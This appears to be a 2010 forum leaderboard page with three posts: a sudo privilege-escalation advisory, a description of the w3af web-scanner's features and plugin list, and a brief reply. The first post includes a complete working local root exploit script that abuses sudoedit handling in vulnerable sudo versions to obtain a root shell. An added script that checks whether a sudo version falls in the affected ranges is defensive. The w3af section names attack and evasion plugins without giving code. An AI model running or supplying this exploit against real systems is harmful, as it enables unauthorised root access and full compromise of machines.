Leaderboard

Popular Content

Showing content with the highest reputation on 03/04/10 in all areas

  1. Severity: HIGH

     To see if your sudo is vulnerable, type sudo -V

     The utility is prone to a local privilege-escalation vulnerability because it fails to correctly validate certain nondefault rules in the 'sudoer' configuration file. This issue occurs in the 'sudo/parse.c' source file. Users in supplementary groups may gain 'root' user privileges. Local attackers could exploit this issue to run arbitrary commands as the 'root' user. Successful exploits can completely compromise an affected computer.

     Affected Products
     - Ubuntu 6.06 LTS
     - Ubuntu 8.04 LTS
     - Ubuntu 8.10
     - Ubuntu 9.04
     - Ubuntu 9.10
     And also other Linux distributions that use Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4

     ---snip---
     #!/bin/sh
     # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
     # local root exploit
     # March 2010
     # automated by kingcope
     # Full Credits to Slouching
     echo Tod Miller Sudo local root exploit
     echo by Slouching
     echo automated by kingcope
     if [ $# != 1 ]
     then
     echo "usage: ./sudoxpl.sh <file you have permission to edit>"
     exit
     fi
     cd /tmp
     cat > sudoedit << _EOF
     #!/bin/sh
     echo ALEX-ALEX
     su
     /bin/su
     /usr/bin/su
     _EOF
     chmod a+x ./sudoedit
     sudo ./sudoedit $1
     --snip---

     cheers, kingcope
    1 point
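
A version check for the ranges quoted in the first post above, as an added example that is not part of the original post or of sudo itself. The function names are hypothetical, the sample `sudo -V` lines are constructed, and it assumes the version appears on a line starting with `Sudo version`.

```sh
#!/bin/sh
# Added example, not from the post: classify a sudo version against the
# ranges the post quotes (1.6.x before 1.6.9p21, 1.7.x before 1.7.2p4).

# Read `sudo -V` output on stdin and print the version from its first line.
sudo_version_from_output() {
    sed -n 's/^Sudo version \([0-9][0-9.p]*\).*/\1/p' | head -n 1
}

# Turn MAJOR.MINOR.PATCH[pN] into one sortable integer; a missing pN is p0.
# Returns 1 for anything that is not in that shape.
sudo_key() {
    case $1 in
        ''|*[!0-9.p]*|*p*p*|*p|*.|*.p*) return 1 ;;
    esac
    ver=${1%%p*}
    plevel=0
    case $1 in *p*) plevel=${1#*p} ;; esac
    old_ifs=$IFS; IFS=.
    set -- $ver
    IFS=$old_ifs
    [ $# -eq 3 ] || return 1
    for part in "$@" "$plevel"; do
        case $part in ''|*[!0-9]*|0[0-9]*) return 1 ;; esac
    done
    echo $(( (($1 * 1000 + $2) * 1000 + $3) * 1000 + plevel ))
}

# Print affected / not-affected for the two branches named in the post,
# not-listed for other branches, unknown for unparsable input.
sudo_status() {
    key=$(sudo_key "$1") || { echo unknown; return 0; }
    case $1 in
        1.6.*) first_fixed=$(sudo_key 1.6.9p21) ;;
        1.7.*) first_fixed=$(sudo_key 1.7.2p4) ;;
        *) echo not-listed; return 0 ;;
    esac
    if [ "$key" -lt "$first_fixed" ]; then echo affected; else echo not-affected; fi
}

# Constructed sample lines (not captured from real hosts); on a live system
# use: sudo_status "$(sudo -V 2>/dev/null | sudo_version_from_output)"
for line in "Sudo version 1.6.9p20" "Sudo version 1.7.2p4" "Sudo version 1.8.31"; do
    v=$(printf '%s\n' "$line" | sudo_version_from_output)
    printf '%s -> %s\n' "$v" "$(sudo_status "$v")"
done
```

Distribution packages often backport fixes without changing the upstream version string, so on the Ubuntu releases listed in the post the package changelog is the authoritative source.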
  2. Framework features

     w3af provides plugin writers with these features:

     urllib2 wrapper
     In order to send requests to the remote server w3af uses urllib2. The xUrllib module of w3af is a wrapper of urllib2 to make the plugin writer's life easier; using this wrapper a plugin writer can forget about proxies, proxy auth, basic/digest auth, etc. This is the complete list of features provided by xUrllib:
     - Proxy
     - Proxy auth ( basic and digest )
     - Site auth ( basic and digest )
     - Gracefully handle timeouts
     - UserAgent faking
     - Add custom headers to requests
     - Cookie handling
     - Local cache for GET and HEAD requests
     - Local dns cache, this will speed up scanning. Only one request is made to the DNS server
     - Keep-alive support for http and https connections
     - File upload using multipart POST requests
     - SSL certificate support

     Output Management
     w3af provides plugin writers with an abstraction layer for data output using the Output Manager. The output manager can also be extended using plugins and can be used for writing results to a txt/html file or sending them over the network using scp; the options are endless. Available output plugins are:
     - Console
     - Text file

     Web Service support
     w3af knows how to parse WSDL files, and audit webservices. Plugin developers can write a simple plugin that will be able to find bugs in web services and also in common HTTP applications.

     HTTP headers fuzzing
     w3af supports finding bugs in HTTP headers with great ease!

     IPC
     IPC ( inter plugin communication ) can easily be done using the knowledge base, another w3af feature that's really useful for plugin developers.

     Session saving
     Framework parameters can be saved to a file using the sessionManager. After that, you can load the settings and start the same scan again without configuring all parameters.

     Fuzzer
     Right now w3af has a really simple fuzzer, but we have plans to extend it. Fuzzers are great, we know it.

     HTML / WML parsing
     w3af provides HTML / WML parsing features that are really easy to use.

     This is the list of plugins that are available in w3af. If you have any comments or feature requests, don't hesitate to send them to the w3af mailing list.

     Plugins
     - audit: xsrf htaccessMethods sqli sslCertificate fileUpload mxInjection generic localFileInclude unSSL xpath osCommanding remoteFileInclude dav ssi eval buffOverflow xss xst blindSqli formatString preg_replace globalRedirect LDAPi phishingVector frontpage responseSplitting
     - bruteforce: formAuthBrute basicAuthBrute
     - grep: dotNetEventValidation pathDisclosure codeDisclosure blankBody metaTags motw privateIP directoryIndexing svnUsers ssn fileUpload strangeHTTPCode hashFind getMails httpAuthDetect wsdlGreper newline passwordProfiling domXss ajax findComments httpInBody strangeHeaders lang errorPages collectCookies strangeParameters error500 objects creditCards oracle feeds
     - evasion: shiftOutShiftInBetweenDots backSpaceBetweenDots rndPath selfReference modsecurity rndCase rndHexEncode reversedSlashes fullWidthEncode rndParam
     - attack: sqlmap osCommandingShell xssBeef localFileReader rfiProxy remoteFileIncludeShell davShell eval fileUploadShell sql_webshell
     - output: htmlFile xmlFile textFile console gtkOutput
     - mangle: sed
     - discovery: webDiff sitemapReader detectReverseProxy phpEggs spiderMan urlFuzzer userDir findvhost fingerprint_os findBackdoor wordnet zone_h performance_testing robotsReader sharedHosting afd allowedMethods phpinfo importResults findCaptchas serverStatus oracleDiscovery yahooSiteExplorer frontpage_version detectTransparentProxy dnsWildcard webSpider fingerMSN googleSets digitSum halberd domain_dot MSNSpider fingerprint_WAF serverHeader wsdlFinder pykto crossDomain fingerPKS googleSpider hmap phishtank fingerGoogle dotNetErrors archiveDotOrg ghdb

     Download basic video tutorial
    1 point
  3. Is your antivirus up to date? By the way, tell me via PM what you downloaded so I can check (I'm an admin on rowarez)
    -1 points